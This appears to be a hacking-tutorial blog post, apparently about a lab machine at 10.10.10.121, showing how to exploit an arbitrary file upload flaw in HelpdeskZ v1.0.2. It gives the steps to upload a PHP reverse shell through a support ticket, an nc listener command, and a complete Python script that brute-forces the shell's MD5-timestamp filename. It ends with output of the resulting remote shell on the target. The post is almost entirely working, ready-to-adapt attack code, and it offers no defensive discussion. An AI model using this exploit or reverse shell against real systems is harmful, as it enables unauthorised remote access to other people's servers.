How to upload a shell in HelpdeskZ v1.0.2

Helpdeskz V1.0.2 Arbitrary File Upload

Submit New ticket and upload the shell

Ignore the file not allowed warning

 

Start the listener 

nc -nvlp 4545

Run the Exploit

import hashlib
import time
import sys
import requests
import calendar
helpdeskzBaseUrl = "http://10.10.10.121/support/uploads/tickets/" # change this
fileName = "reverse_shell.php" # Your reverse shell
response = requests.head('http://10.10.10.121') # Change this
serverTime=response.headers['Date'] # getting the server time
timeFormat="%a, %d %b %Y %H:%M:%S %Z"
currentTime = int (calendar.timegm(time.strptime(serverTime,timeFormat)))
for x in range(0, 800):
   plaintext = fileName + str(currentTime - x)
   md5hash = hashlib.md5(plaintext.encode()).hexdigest()
   url = helpdeskzBaseUrl+md5hash+'.php'
   print(url)
   response = requests.head(url)
   if response.status_code == 200:
      print ("found!")
      print (url)
      sys.exit(0)
print ("Sorry, I did not find anything")

 

Shell

[email protected]# nc -lnvp 4545
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4545
Ncat: Listening on 0.0.0.0:4545
Ncat: Connection from 10.10.10.121.
Ncat: Connection from 10.10.10.121:50042.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(help) gid=1000(help) groups=1000(help)

 

 

Comments are closed, but trackbacks and pingbacks are open.

SignupSubscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.

Subscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.